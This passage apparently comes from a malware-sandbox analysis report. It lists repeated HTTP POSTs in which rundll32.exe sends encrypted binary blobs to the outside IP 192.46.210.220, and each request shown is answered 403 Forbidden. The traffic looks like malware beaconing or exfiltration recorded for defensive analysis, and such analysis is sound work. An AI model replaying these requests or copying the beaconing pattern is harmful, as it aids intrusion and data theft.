                                                                                                        2021-10-28 02:52:15 UTC194OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:52:16 UTC203INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:52:16 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        4192.168.2.549766192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:51:05 UTC19OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:51:05 UTC19OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:51:06 UTC24INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:51:06 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        40192.168.2.549921192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:52:16 UTC198OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:52:16 UTC198OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:52:17 UTC203INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:52:17 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        41192.168.2.549927192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:52:19 UTC203OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:52:19 UTC203OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:52:20 UTC213INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:52:20 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        42192.168.2.549929192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:52:20 UTC208OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:52:20 UTC208OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:52:21 UTC213INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:52:20 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        43192.168.2.549936192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:52:24 UTC213OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:52:24 UTC213OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:52:24 UTC223INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:52:24 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        44192.168.2.549937192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:52:24 UTC218OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:52:24 UTC218OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:52:25 UTC223INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:52:25 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        45192.168.2.549944192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:52:28 UTC223OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:52:28 UTC223OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:52:28 UTC233INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:52:28 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        46192.168.2.549945192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:52:28 UTC228OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:52:28 UTC228OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:52:29 UTC233INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:52:29 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        47192.168.2.549953192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:52:31 UTC233OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:52:31 UTC233OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:52:32 UTC243INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:52:32 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        48192.168.2.549955192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:52:32 UTC238OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:52:32 UTC238OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:52:33 UTC243INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:52:32 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        49192.168.2.549968192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:52:35 UTC243OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:52:35 UTC243OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:52:36 UTC253INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:52:36 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        5192.168.2.549772192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:51:09 UTC24OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:51:09 UTC24OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:51:09 UTC34INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:51:09 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        50192.168.2.549972192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:52:36 UTC248OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
